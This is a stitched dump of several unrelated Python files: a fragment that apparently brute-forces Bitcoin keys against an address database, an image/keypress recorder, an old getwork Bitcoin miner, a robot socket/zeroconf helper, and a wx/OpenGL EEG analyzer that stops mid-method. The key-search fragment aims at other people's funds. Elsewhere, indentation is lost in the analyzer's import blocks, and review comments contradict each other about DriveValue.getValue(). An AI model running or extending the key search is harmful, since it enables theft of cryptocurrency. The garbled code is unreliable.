        # Backward walk from the same starting seed.
        key_down = newKeyGen.keygen(downward.hex())
        plutus.process(key_down[0], key_down[2], key_down[3], database)
        plutus.process(key_down[0], key_down[2], key_down[4], database)
        hashIterator.changeHash(upward, 1)
        hashIterator.changeHash(downward, -1)
if __name__ == '__main__':
    # Load the address database once, then scan in the current process.
    database = plutus.read_database()
    # Multiprocessing fan-out kept for reference; currently single-process.
    # for cpu in range(multiprocessing.cpu_count()):
    # for cpu in range(1):
    #     multiprocessing.Process(target=main, args=(database, )).start()
    main(database)
record_tape.py | import os, csv, threading, time
class RecordTape(object):
    """Background recorder: queues (image, key) pairs via write(), and a
    worker thread splits each image into a camera crop and a map crop,
    saves both as JPEGs, and appends a CSV row linking them to the key.

    NOTE(review): `self.lock` is created but never acquired — the producer
    (write) and consumer (run) share `self.tape` unsynchronized; list
    append/pop are atomic in CPython, but confirm this is intentional.
    """
    def __init__(self,
                 real_exit,
                 save_dir,
                 region,
                 image_box,
                 map_box):
        self.real_exit = real_exit    # callback invoked with the open CSV file on shutdown
        self.save_dir = save_dir
        self.region = region          # unused here; presumably capture region — confirm with caller
        self.image_box = image_box    # crop box for the camera image
        self.map_box = map_box        # crop box for the minimap image
        self.tape = []                # pending (img, key) pairs, FIFO
        self.lock = threading.Lock()
        self.exiting = False
        self.image_index = 0          # disambiguates files saved within the same second
        self.image_dir = "{}images/".format(save_dir)
        self.map_dir = "{}maps/".format(save_dir)
        if not os.path.exists(self.image_dir):
            os.makedirs(self.image_dir)
        if not os.path.exists(self.map_dir):
            os.makedirs(self.map_dir)
        # Pick a timestamped CSV name; retry until the second ticks past any
        # existing file with the same name.
        csv_file_name = "{}record_{}.csv".format(save_dir, int(time.time()))
        while os.path.exists(csv_file_name):
            csv_file_name = "{}record_{}.csv".format(save_dir, int(time.time()))
        self.csv_file = open(csv_file_name, "w")
        self.writer = csv.writer(self.csv_file)
        # Consumer thread drains self.tape until exit() is called.
        threading.Thread(target=self.run).start()

    def write(self, img, key):
        # Producer side: just enqueue; all disk I/O happens on the worker thread.
        self.tape.append((img, key))

    def exit(self):
        # Request shutdown; run() finishes draining the queue, then calls real_exit.
        self.exiting = True

    def run(self):
        """Worker loop: drain the tape, saving crops and CSV rows."""
        while True:
            if len(self.tape) == 0:
                if self.exiting:
                    # Queue drained and shutdown requested: hand the CSV
                    # file to the caller-supplied cleanup and stop.
                    self.real_exit(self.csv_file)
                    break
                time.sleep(1)
            else:
                if not self.exiting:
                    # Throttle while recording is live; during shutdown the
                    # backlog is flushed at full speed.
                    time.sleep(1)
                img, key = self.tape.pop(0)
                # First frame doubles as a session preview image.
                if not os.path.exists("{}/preview.jpg".format(self.save_dir)):
                    img.save("{}/preview.jpg".format(self.save_dir))
                image, map = self.__split_and_save(img)
                name = "{}_{}".format(int(time.time()), self.image_index)
                self.image_index += 1
                image_name = "{}{}.jpg".format(self.image_dir, name)
                map_name = "{}{}.jpg".format(self.map_dir, name)
                image.save(image_name)
                map.save(map_name)
                self.writer.writerow([name, key])

    def __split_and_save(self, img):
        # Crop the two regions of interest out of the full frame.
        # (Despite the name, this method does not save — run() does.)
        image = img.crop(self.image_box)
        map = img.crop(self.map_box)
        return image, map
|
pyminer.py | #!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
    # Minimal JSON-RPC 1.1 client for a bitcoind node (Python 2 / httplib).
    # NOTE(review): OBJID starts as a class attribute but `self.OBJID += 1`
    # rebinds it per instance, so request ids are per-connection, not global.
    OBJID = 1

    def __init__(self, host, port, username, password):
        # HTTP Basic auth header, reused for every request.
        authpair = "%s:%s" % (username, password)
        self.authhdr = "Basic %s" % (base64.b64encode(authpair))
        # strict=False, 30s timeout.
        self.conn = httplib.HTTPConnection(host, port, False, 30)

    def rpc(self, method, params=None):
        # Issue one JSON-RPC call; returns the 'result' field, the server's
        # error object on RPC error, or None on transport/decode failure.
        self.OBJID += 1
        obj = { 'version' : '1.1',
                'method' : method,
                'id' : self.OBJID }
        if params is None:
            obj['params'] = []
        else:
            obj['params'] = params
        self.conn.request('POST', '/', json.dumps(obj),
            { 'Authorization' : self.authhdr,
              'Content-type' : 'application/json' })
        resp = self.conn.getresponse()
        if resp is None:
            print "JSON-RPC: no response"
            return None
        body = resp.read()
        resp_obj = json.loads(body)
        if resp_obj is None:
            print "JSON-RPC: cannot JSON-decode body"
            return None
        if 'error' in resp_obj and resp_obj['error'] != None:
            # Caller receives the raw error object, not an exception.
            return resp_obj['error']
        if 'result' not in resp_obj:
            print "JSON-RPC: no result in object"
            return None
        return resp_obj['result']

    def getblockcount(self):
        # Current best-chain height.
        return self.rpc('getblockcount')

    def getwork(self, data=None):
        # With data=None fetches new work; with data submits a solution.
        return self.rpc('getwork', data)
def uint32(x):
    # Truncate x to an unsigned 32-bit value (Python 2 long literal).
    return x & 0xffffffffL
def bytereverse(x):
    # Swap the byte order of a 32-bit word (endianness flip).
    return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
                    (((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
    # Byte-swap each 32-bit word of a binary buffer in place-order
    # (buffer length is assumed to be a multiple of 4).
    out_words = []
    for i in range(0, len(in_buf), 4):
        word = struct.unpack('@I', in_buf[i:i+4])[0]
        out_words.append(struct.pack('@I', bytereverse(word)))
    return ''.join(out_words)
def wordreverse(in_buf):
    # Reverse the order of the 32-bit words in a binary buffer
    # (each word's internal byte order is left untouched).
    out_words = []
    for i in range(0, len(in_buf), 4):
        out_words.append(in_buf[i:i+4])
    out_words.reverse()
    return ''.join(out_words)
class Miner:
    # One getwork-protocol mining worker (Python 2): fetches work from the
    # RPC server, grinds nonces over double-SHA256, submits any solution.
    def __init__(self, id):
        self.id = id
        # Nonces scanned per getwork; re-tuned each iteration from 'scantime'.
        self.max_nonce = MAX_NONCE

    def work(self, datastr, targetstr):
        """Scan nonces for one work unit; return (hashes_done, nonce_bin or None)."""
        # decode work data hex string to binary
        static_data = datastr.decode('hex')
        static_data = bufreverse(static_data)
        # the first 76b of 80b do not change
        blk_hdr = static_data[:76]
        # decode 256-bit target value
        targetbin = targetstr.decode('hex')
        targetbin = targetbin[::-1]  # byte-swap and dword-swap
        targetbin_str = targetbin.encode('hex')
        target = long(targetbin_str, 16)
        # pre-hash first 76b of block header
        static_hash = hashlib.sha256()
        static_hash.update(blk_hdr)
        for nonce in xrange(self.max_nonce):
            # encode 32-bit nonce value
            nonce_bin = struct.pack("<I", nonce)
            # hash final 4b, the nonce value
            hash1_o = static_hash.copy()
            hash1_o.update(nonce_bin)
            hash1 = hash1_o.digest()
            # sha256 hash of sha256 hash
            hash_o = hashlib.sha256()
            hash_o.update(hash1)
            hash = hash_o.digest()
            # quick test for winning solution: high 32 bits zero?
            if hash[-4:] != '\0\0\0\0':
                continue
            # convert binary hash to 256-bit Python long
            hash = bufreverse(hash)
            hash = wordreverse(hash)
            hash_str = hash.encode('hex')
            l = long(hash_str, 16)
            # proof-of-work test:  hash < target
            if l < target:
                print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
                return (nonce + 1, nonce_bin)
            else:
                print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
                # return (nonce + 1, nonce_bin)
        return (nonce + 1, None)

    def submit_work(self, rpc, original_data, nonce_bin):
        # Splice the winning nonce back into the original hex work data and
        # push it upstream via getwork(data).
        nonce_bin = bufreverse(nonce_bin)
        nonce = nonce_bin.encode('hex')
        solution = original_data[:152] + nonce + original_data[160:256]
        param_arr = [ solution ]
        result = rpc.getwork(param_arr)
        print time.asctime(), "--> Upstream RPC result:", result

    def iterate(self, rpc):
        # One fetch/scan/submit cycle; sleeps and retries on malformed work.
        work = rpc.getwork()
        if work is None:
            time.sleep(ERR_SLEEP)
            return
        if 'data' not in work or 'target' not in work:
            time.sleep(ERR_SLEEP)
            return
        time_start = time.time()
        (hashes_done, nonce_bin) = self.work(work['data'],
                                             work['target'])
        time_end = time.time()
        time_diff = time_end - time_start
        # Resize the next scan so it takes roughly settings['scantime'] secs.
        self.max_nonce = long(
            (hashes_done * settings['scantime']) / time_diff)
        if self.max_nonce > 0xfffffffaL:
            self.max_nonce = 0xfffffffaL
        if settings['hashmeter']:
            print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
                self.id, hashes_done,
                (hashes_done / 1000.0) / time_diff)
        if nonce_bin is not None:
            self.submit_work(rpc, work['data'], nonce_bin)

    def loop(self):
        # Connect once, then mine forever.
        rpc = BitcoinRPC(settings['host'], settings['port'],
                         settings['rpcuser'], settings['rpcpass'])
        if rpc is None:
            return
        while True:
            self.iterate(rpc)
def miner_thread(id):
    # Entry point for each worker process: run one Miner forever.
    miner = Miner(id)
    miner.loop()
if __name__ == '__main__':
    if len(sys.argv) != 2:
        print "Usage: pyminer.py CONFIG-FILE"
        sys.exit(1)
    # Parse the config file: '#' comment lines skipped, key=value pairs kept.
    f = open(sys.argv[1])
    for line in f:
        # skip comment lines
        m = re.search('^\s*#', line)
        if m:
            continue
        # parse key=value lines
        m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
        if m is None:
            continue
        settings[m.group(1)] = m.group(2)
    f.close()
    # Defaults for anything the config file omitted.
    if 'host' not in settings:
        settings['host'] = '127.0.0.1'
    if 'port' not in settings:
        settings['port'] = 16117
    if 'threads' not in settings:
        settings['threads'] = 1
    if 'hashmeter' not in settings:
        settings['hashmeter'] = 0
    if 'scantime' not in settings:
        settings['scantime'] = 30L
    if 'rpcuser' not in settings or 'rpcpass' not in settings:
        print "Missing username and/or password in cfg file"
        sys.exit(1)
    # Config values arrive as strings; normalize the numeric ones.
    settings['port'] = int(settings['port'])
    settings['threads'] = int(settings['threads'])
    settings['hashmeter'] = int(settings['hashmeter'])
    settings['scantime'] = long(settings['scantime'])
    # Fan out one mining process per configured thread.
    thr_list = []
    for thr_id in range(settings['threads']):
        p = Process(target=miner_thread, args=(thr_id,))
        p.start()
        thr_list.append(p)
        time.sleep(1)  # stagger threads
    print settings['threads'], "mining threads started"
    print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
    try:
        for thr_proc in thr_list:
            thr_proc.join()
    except KeyboardInterrupt:
        pass
    print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
common.py | import socket
import zeroconf # DO: pip3 install zeroconf
import threading
import sched, time
def get_ip():
    """Return this machine's outward-facing IPv4 address.

    Connecting a UDP socket transmits nothing, but forces the OS to
    choose the source address it would use for that route.
    """
    probe = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        probe.connect(("1.2.3.4", 1))  # dummy connect
        return probe.getsockname()[0]
    finally:
        probe.close()
class ServerSocket:
    """Line-oriented TCP server wrapper listening on 0.0.0.0:19400.

    Fixes: send() used socket.send(), which may transmit only part of the
    payload — sendall() is used instead; close() no longer relies on a bare
    ``except`` and handles the not-yet-accepted case explicitly.
    """
    MSGLEN = 512

    def __init__(self, sock=None):
        if sock is None:
            self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            # Allow quick restarts without waiting for TIME_WAIT to expire.
            self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            self.sock.bind(("0.0.0.0", 19400))
            self.sock.listen()
        else:
            self.sock = sock

    def accept(self):
        """Block for one client; keep its connection as server_socket."""
        (conn, addr) = self.sock.accept()
        self.server_socket = conn

    def send(self, msg):
        # sendall() retries until the whole UTF-8 payload is written
        # (plain send() may write only a prefix).
        self.server_socket.sendall(msg.encode("utf-8"))

    def receive(self):
        """Read one newline-terminated message; '' chunk means peer closed."""
        chunks = []
        while True:
            # OK, I know, we are not going for efficiency here...
            chunk = self.server_socket.recv(1)
            chunks.append(chunk)
            if chunk == b"\n" or chunk == b"":
                break
        return b"".join(chunks).decode("utf-8")

    def close(self):
        try:
            self.sock.close()
            # server_socket only exists after accept(); missing is not an error.
            if hasattr(self, "server_socket"):
                self.server_socket.close()
        except OSError:
            print("Could not close all sockets")
class DriveValue:
    """
    This represents a drive value for either left or right control. Valid values are between -1.0 and 1.0

    Consistency fix: ZeroReverter in this module calls ``getValue()`` on its
    drive objects, which this class never defined; ``getValue()`` is added as
    an alias of ``read()`` (backward compatible).
    """

    MAX = 1.0
    MIN = -1.0
    DELTA = 0.05   # default step for incr()/decr()
    value = 0.0    # class-level default; instance attribute after first write

    def reset(self):
        """Zero the value and return it."""
        self.value = 0.0
        return self.value

    def incr(self, by_value=0):
        """Increase by by_value (or DELTA when 0), clamped at MAX; return rounded value."""
        self.value = min(
            self.MAX, self.value + (by_value if by_value != 0 else self.DELTA)
        )
        return round(self.value, 3)

    def decr(self, by_value=0):
        """Decrease by by_value (or DELTA when 0), clamped at MIN; return rounded value."""
        self.value = max(
            self.MIN, self.value - (by_value if by_value != 0 else self.DELTA)
        )
        return round(self.value, 3)

    def max(self):
        """Jump to full forward (MAX) and return it."""
        self.value = self.MAX
        return self.value

    def min(self):
        """Jump to full reverse (MIN) and return it."""
        self.value = self.MIN
        return self.value

    def write(self, value):
        """Set the value directly (no clamping, matching original behavior)."""
        self.value = value
        return self.value

    def read(self):
        """Return the current value rounded to 3 decimals."""
        return round(self.value, 3)

    def getValue(self):
        # Alias for read(), matching the accessor name ZeroReverter expects.
        return self.read()
class ZeroReverter:
    # Gradually ramps the left/right drive values back to zero over a fixed
    # number of scheduler steps, emitting a driveCmd message each step.
    #
    # NOTE(review): this calls left.getValue()/right.getValue(), but
    # DriveValue in this module defines read(), not getValue() — confirm the
    # drive objects passed in actually expose getValue().
    def __init__(self, left, right, duration, steps, s_socket):
        """
        We like to revert left and right DriveValues to zero in `duration` milliseconds in `steps` steps.
        """
        if duration < steps:
            raise Exception("Duration too small")
        self.left = left
        self.right = right
        self.duration = duration
        self.steps = steps
        # Delay between consecutive ramp steps.
        self.interval = duration / steps
        self.event = None
        self.scheduler = sched.scheduler(time.time, time.sleep)
        self.s_socket = s_socket

    def reset(self):
        # (Re)start the ramp: cancel any pending step, compute the per-step
        # decrement from the current values, and run the scheduler on its
        # own thread so this call does not block.
        if self.event is not None and not self.scheduler.empty():
            self.scheduler.cancel(self.event)
        self.delta_left = self.left.getValue() / self.steps
        self.delta_right = self.right.getValue() / self.steps
        self.event = self.scheduler.enter(self.interval, 1, self.send_command)
        t = threading.Thread(target=self.scheduler.run)
        t.start()

    def send_command(self):
        """One ramp step: decrement both sides, reschedule or snap to zero,
        then push the current values to the robot over the socket."""
        ROUND_ERROR = 0.001
        self.left.decr(self.delta_left)
        self.right.decr(self.delta_right)
        if abs(self.left.getValue()) < ROUND_ERROR:
            # Close enough to zero: snap both channels and stop rescheduling.
            self.left.reset()
            self.right.reset()
        else:
            self.event = self.scheduler.enter(self.interval, 1, self.send_command)
        try:
            self.s_socket.send(
                "{{driveCmd: {{l:{l}, r:{r} }} }}\n".format(
                    l=self.left.getValue(), r=self.right.getValue()
                )
            )
        except Exception as e:
            # Socket failure: stop the ramp instead of retrying forever.
            print(f"Stopping scheduler...got exception {e}\r")
            if self.event is not None and not self.scheduler.empty():
                self.scheduler.cancel(self.event)
        finally:
            if not self.scheduler.empty():
                self.scheduler.cancel(self.event)
def register(name, port, properties=None):
    """Advertise an ``_openbot._tcp`` service on the LAN via zeroconf.

    Returns (zc, info) so the caller can later unregister the service.

    Fixes: ``properties`` used a mutable default dict shared across calls
    (now None -> fresh dict, backward compatible); the service-type string
    was duplicated — the ``type_`` variable is now actually used.
    """
    if properties is None:
        properties = {}
    type_ = "_openbot._tcp.local."
    ip_addr = socket.inet_pton(socket.AF_INET, get_ip())
    info = zeroconf.ServiceInfo(
        type_=type_,
        name=name + "." + type_,
        addresses=[ip_addr],
        port=port,
        weight=0,
        priority=0,
        properties=properties,
    )
    zc = zeroconf.Zeroconf([get_ip()])
    zc.register_service(info)
    return (zc, info)
|
Triathlon-Analyzer.py | #!/usr/bin/python
# Howto, Code license, Credits, etc: http://code.google.com/B/BCI-Project-Triathlon/
noGL = False # Set noGL to True for disabling the use of OpenGL (to gain speed, or to avoid python-wx-opengl problems)
import numpy
import wx
import math
import threading
import random
import sys
import os
import random
import InputManager
import WXElements
try:
from wx import glcanvas
haveGLCanvas = True
except ImportError:
haveGLCanvas = False
noGL = True
print "Will start without OpenGL, because wx.glcanvas is not available."
try:
from OpenGL.GL import *
from OpenGL.GLU import *
from OpenGL.GLUT import *
haveOpenGL = True
except ImportError:
haveOpenGL = False
noGL = True
print "Will start without OpenGL, because PyOpenGL is not available."
class AppSettings():
    """User-tunable analyzer settings.

    Fix: ``bands`` used a mutable default list, so every instance created
    without the argument shared (and could corrupt) the same list; it now
    defaults to None and each instance gets a fresh copy.
    """

    # (low_hz, high_hz) EEG frequency bands analyzed per device.
    DEFAULT_BANDS = [(2,4),(5,7),(8,10),(11,13),(14,16),(17,20),(21,24),(25,30),(31,45)]

    def __init__(self,
                 niaFPS = 10,
                 deviceName = "OCZ Neural Impulse Actuator",
                 bands = None):
        self.niaFPS = niaFPS            # sampling/redraw rate, frames per second
        self.deviceName = deviceName    # input device display name
        # Copy the defaults so mutating one instance never affects others.
        self.bands = list(self.DEFAULT_BANDS) if bands is None else bands
class RawVisualizationPanel(WXElements.GLCanvasBase):
    # GL panel drawing the raw signal trace of each device (tab index 0).
    # Reads the module-level bciDevice global; Python 2 code (xrange).
    def InitGL(self):
        # Fixed-function setup: one light, depth test, black clear color,
        # perspective projection, camera 10 units down +Z looking at origin.
        light_diffuse = [1.0, 1.0, 1.0, 1.0]
        light_position = [1.0, 1.0, 1.0, 0.0]
        glLightfv(GL_LIGHT0, GL_DIFFUSE, light_diffuse)
        glLightfv(GL_LIGHT0, GL_POSITION, light_position)
        glEnable(GL_LIGHTING)
        glEnable(GL_LIGHT0)
        glEnable(GL_DEPTH_TEST)
        glClearColor(0.0, 0.0, 0.0, 1.0)
        glClearDepth(1.0)
        glMatrixMode(GL_PROJECTION)
        glLoadIdentity()
        gluPerspective(40.0, 1.0, 1.0, 30.0)
        glMatrixMode(GL_MODELVIEW)
        glLoadIdentity()
        gluLookAt(0.0, 0.0, 10.0,
                  0.0, 0.0, 0.0,
                  0.0, 1.0, 0.0)
    def OnDraw(self):
        glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
        glLoadIdentity()
        glEnableClientState(GL_VERTEX_ARRAY)
        # One line strip per device: the last 500 raw samples, scaled by
        # 1e-7 and stacked vertically so each device gets its own row.
        for eachI in range(len(bciDevice.devices)):
            glColor(0.55,0.55,0.3)
            wave_array = []
            for historyIndex in reversed(xrange(500)):
                wave_array = wave_array +[[-1.0+ (2.0*float(historyIndex)/499.0), -1.0+((2.0*eachI)+(0.0000001*bciDevice.working_Data(eachI)[-1-historyIndex]))/len(bciDevice.devices)]]
            glVertexPointerf(wave_array)
            glDrawArrays(GL_LINE_STRIP, 0, len(wave_array))
        # Bitmap-font label for each device row.
        for eachI in range(len(bciDevice.devices)):
            glColor(0.55,0.55,0.3)
            glRasterPos2f(0.2 ,-0.5 +( (2.0*eachI))/len(bciDevice.devices))
            for eachChar in ("Device "+str(eachI)+" Raw"):
                glutBitmapCharacter(GLUT_BITMAP_HELVETICA_12, ord(eachChar))
        self.SwapBuffers()
    def newReading(self):
        # Redraw only when this panel's notebook tab (index 0) is visible.
        if self.GetGrandParent().GetSelection()==0:
            self.SetCurrent()
            self.OnDraw()
    def resetReading(self):
        # No history kept here, so a reset is just a redraw.
        if self.GetGrandParent().GetSelection()==0:
            self.SetCurrent()
            self.OnDraw()
class FFTVisualizationPanel(WXElements.GLCanvasBase):
    # GL panel drawing, per device, the 0-50 Hz FFT curve plus one bar per
    # configured EEG band (tab index 2). Uses the bciDevice/settings globals.
    def InitGL(self):
        # Fixed-function setup identical to the other panels: one light,
        # depth test, black clear, perspective camera at +10 Z.
        light_diffuse = [1.0, 1.0, 1.0, 1.0]
        light_position = [1.0, 1.0, 1.0, 0.0]
        glLightfv(GL_LIGHT0, GL_DIFFUSE, light_diffuse)
        glLightfv(GL_LIGHT0, GL_POSITION, light_position)
        glEnable(GL_LIGHTING)
        glEnable(GL_LIGHT0)
        glEnable(GL_DEPTH_TEST)
        glClearColor(0.0, 0.0, 0.0, 1.0)
        glClearDepth(1.0)
        glMatrixMode(GL_PROJECTION)
        glLoadIdentity()
        gluPerspective(40.0, 1.0, 1.0, 30.0)
        glMatrixMode(GL_MODELVIEW)
        glLoadIdentity()
        gluLookAt(0.0, 0.0, 10.0,
                  0.0, 0.0, 0.0,
                  0.0, 1.0, 0.0)
    def OnDraw(self):
        glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
        glLoadIdentity()
        glEnableClientState(GL_VERTEX_ARRAY)
        # One quad per (device, band): bar height = mean magnitude in band.
        for eachI in range(len(bciDevice.devices)):
            for eachFingerI in range(len(settings.bands)):
                everyFingerI = (eachI*len(settings.bands)) + eachFingerI
                glColor(everyFingerI*0.05+0.3,-everyFingerI*0.05+0.9,float(everyFingerI%2))
                seg = bciDevice.frequencies(eachI,settings.bands[eachFingerI][0],settings.bands[eachFingerI][1])
                avg = sum(seg)/len(seg)
                wave_array = [[ -1.0+ (2.0*float(settings.bands[eachFingerI][0])/49.0) , -1.0+((2.0*eachI))/len(bciDevice.devices) ],
                              [ -1.0+ (2.0*float(settings.bands[eachFingerI][0])/49.0) , -1.0+((2.0*eachI) + avg)/len(bciDevice.devices)],
                              [ -1.0+ (2.0*float(settings.bands[eachFingerI][1])/49.0), -1.0+((2.0*eachI))/len(bciDevice.devices)],
                              [ -1.0+ (2.0*float(settings.bands[eachFingerI][1])/49.0), -1.0+((2.0*eachI) + avg)/len(bciDevice.devices)]]
                glVertexPointerf(wave_array)
                glDrawArrays(GL_QUAD_STRIP, 0, len(wave_array))
        # FFT magnitude curve over 0-50 Hz, one line strip per device.
        for eachI in range(len(bciDevice.devices)):
            glColor(1.0,0.55,0.3)
            wave_array = []
            for freqs in reversed(xrange(50)):
                wave_array = wave_array +[[-1.0+ (2.0*float(freqs)/49.0), -1.0+((2.0*eachI)+(bciDevice.frequencies(eachI,0,50)[freqs]))/len(bciDevice.devices)]]
            glVertexPointerf(wave_array)
            glDrawArrays(GL_LINE_STRIP, 0, len(wave_array))
        # Bitmap-font labels per device row.
        for eachI in range(len(bciDevice.devices)):
            glColor(1.0,0.55,0.3)
            glRasterPos2f(0.2 ,-0.55 +( (2.0*eachI))/len(bciDevice.devices))
            for eachChar in ("Device "+str(eachI)+" FFT"):
                glutBitmapCharacter(GLUT_BITMAP_HELVETICA_12, ord(eachChar))
            glColor(0.55,0.55,0.55)
            glRasterPos2f(0.2 ,-0.60 +( (2.0*eachI))/len(bciDevice.devices))
            for eachChar in ("Device "+str(eachI)+" EEG Bands"):
                glutBitmapCharacter(GLUT_BITMAP_HELVETICA_12, ord(eachChar))
        self.SwapBuffers()
    def newReading(self):
        # Redraw only when this panel's notebook tab (index 2) is visible.
        if self.GetGrandParent().GetSelection()==2:
            self.SetCurrent()
            self.OnDraw()
    def resetReading(self):
        # No history kept here, so a reset is just a redraw.
        if self.GetGrandParent().GetSelection()==2:
            self.SetCurrent()
            self.OnDraw()
class FFTHistoryVisualizationPanel(WXElements.GLCanvasBase):
    # GL panel showing a rolling 100-sample history of each (device, band)
    # average magnitude, one labeled line per band (tab index 3).
    def __init__(self, parent):
        # ylists[t][i]: averaged band power; index 0 is the newest sample,
        # i enumerates device*bands + band.
        self.ylists = [[ 0.0 for each in xrange(len(settings.bands)*len(bciDevice.devices))] for every in range(100)]
        self.xlist = [float(i)/float(-1+len(self.ylists[0])) for i in xrange(len(self.ylists[0]))]
        WXElements.GLCanvasBase.__init__(self, parent)
    def InitGL(self):
        # Fixed-function setup identical to the other panels.
        light_diffuse = [1.0, 1.0, 1.0, 1.0]
        light_position = [1.0, 1.0, 1.0, 0.0]
        glLightfv(GL_LIGHT0, GL_DIFFUSE, light_diffuse)
        glLightfv(GL_LIGHT0, GL_POSITION, light_position)
        glEnable(GL_LIGHTING)
        glEnable(GL_LIGHT0)
        glEnable(GL_DEPTH_TEST)
        glClearColor(0.0, 0.0, 0.0, 1.0)
        glClearDepth(1.0)
        glMatrixMode(GL_PROJECTION)
        glLoadIdentity()
        gluPerspective(40.0, 1.0, 1.0, 30.0)
        glMatrixMode(GL_MODELVIEW)
        glLoadIdentity()
        gluLookAt(0.0, 0.0, 10.0,
                  0.0, 0.0, 0.0,
                  0.0, 1.0, 0.0)
    def OnDraw(self):
        glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
        glLoadIdentity()
        glEnableClientState(GL_VERTEX_ARRAY)
        # One history line strip + label per (device, band) combination.
        for everyFingerI in range(len(settings.bands)*len(bciDevice.devices)):
            glColor(everyFingerI*0.05+0.3,-everyFingerI*0.05+0.9,float(everyFingerI%2))
            wave_array = []
            for historyIndex in xrange(100):
                wave_array.append([-1.0+ (2.0*float(historyIndex)/99.0), -0.9 + (0.1*everyFingerI) + (0.3 * self.ylists[historyIndex][everyFingerI])])
            glVertexPointerf(wave_array)
            glDrawArrays(GL_LINE_STRIP, 0, len(wave_array))
            glRasterPos2f(-0.95 ,-0.95 + (0.1*everyFingerI) )
            for eachChar in ("Device "+str(everyFingerI/len(settings.bands))+", Band "+str(everyFingerI%len(settings.bands))+": "+
                             str(settings.bands[everyFingerI%len(settings.bands)][0])+
                             "-"+
                             str(settings.bands[everyFingerI%len(settings.bands)][1])+" Hz"):
                glutBitmapCharacter(GLUT_BITMAP_HELVETICA_12, ord(eachChar))
        self.SwapBuffers()
    def newReading(self):
        # Compute each band's mean magnitude on each device, push it onto
        # the history (newest first, oldest dropped), redraw if visible.
        newReadings = []
        for eachDeviceI in range(len(bciDevice.devices)):
            for eachFingerIndex in range(len(settings.bands)):
                fingerlist = bciDevice.frequencies(eachDeviceI,settings.bands[eachFingerIndex][0],settings.bands[eachFingerIndex][1])
                newReadings.append(float(sum(fingerlist))/float(len(fingerlist)))
        self.ylists = [newReadings]+self.ylists[0:99]
        if self.GetGrandParent().GetSelection()==3:
            self.SetCurrent()
            self.OnDraw()
    def resetReading(self):
        # Zero out the stored history, then redraw if visible.
        self.ylists = [[0.0 for each in xrange(len(settings.bands)*len(bciDevice.devices))] for every in range(100)]
        if self.GetGrandParent().GetSelection()==3:
            self.SetCurrent()
            self.OnDraw()
class SpectogramVisualizationPanel(WXElements.GLCanvasBase):
def __init__(self, parent):
WXElements.GLCanvasBase.__init__(self, parent)
self.historyLength = 5
self.colorlists = [[ self.spectralColor(0.0) for each in xrange(50*len(bciDevice.devices))] for every in xrange(self.historyLength)]
xlist = [-1.0+(2.0*float(i)/float(-1+self.historyLength)) for i in xrange(self.historyLength)]
ylist = [-1.0+(2.0*float(i)/float(-1+len(self.colorlists[0]))) for i in xrange(len(self.colorlists[0]))]
columns = []
self.quadCols = []
for historyIndex in xrange(self.historyLength):
x = xlist[historyIndex]
columns.append([[x,y] for y in ylist])
for historyIndex in xrange(self.historyLength-1):
self.quadCols.append(zip ( columns[historyIndex] , columns[historyIndex+1]))
self.spectralColorColumHistory = []
for historyIndex in xrange(self.historyLength-1):
self.spectralColorColumHistory.append(zip ( self.colorlists[historyIndex] , self.colorlists[historyIndex+1]))
def InitGL(self):
light_diffuse = [1.0, 1.0, 1.0, 1.0]
light_position = [1.0, 1.0, 1.0, 0.0]
glLightfv(GL_LIGHT0, GL_DIFFUSE, light_diffuse)
glLightfv(GL_LIGHT0, GL_POSITION, light_position)
glEnable(GL_LIGHTING)
glEnable(GL_LIGHT0)
glEnable(GL_DEPTH_TEST)
glClearColor(0.0, 0.0, 0.0, 1.0)
glClearDepth(1.0)
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
gluPerspective(40.0, 1.0, 1.0, 30.0)
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
gluLookAt(0.0, 0.0, 10.0,
0.0, 0.0, 0.0,
0.0, 1.0, 0.0)
def OnDraw(self):
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
glLoadIdentity()
glEnableClientState(GL_VERTEX_ARRAY)
glEnableClientState(GL_COLOR_ARRAY)
for historyIndex in xrange(self.historyLength-1):
glVertexPointerf(self.quadCols[historyIndex])
glColorPointerf(self.spectralColorColumHistory[historyIndex])
glDrawArrays(GL_QUAD_STRIP, 0, 2*50*len(bciDevice.devices))
self.SwapBuffers()
def newReading(self):
newReadings = []
for eachDeviceI in range(len(bciDevice.devices)):
newReadings.extend(bciDevice.frequencies(eachDeviceI,0,50))
self.colorlists = [map(self.spectralColor,newReadings)]+self.colorlists[0:(self.historyLength-1)]
self.spectralColorColumHistory = [ zip ( self.colorlists[0] , self.colorlists[1])
]+self.spectralColorColumHistory[0:(self.historyLength-2)]
if self.GetGrandParent().GetSelection()==1:
self.SetCurrent()
self.OnDraw()
def resetReading(self):
    """Reset the colour history to all-zero readings, rebuild the quad
    geometry over [-1, 1] x [-1, 1], and redraw if this tab is visible.
    """
    # Fresh zero-colour column per history slot (no shared inner lists).
    self.colorlists = [[self.spectralColor(0.0) for _ in xrange(50 * len(bciDevice.devices))]
                       for _ in xrange(self.historyLength)]
    column_count = self.historyLength
    row_count = len(self.colorlists[0])
    # Evenly spaced normalised device coordinates along each axis.
    xs = [-1.0 + (2.0 * float(i) / float(column_count - 1)) for i in xrange(column_count)]
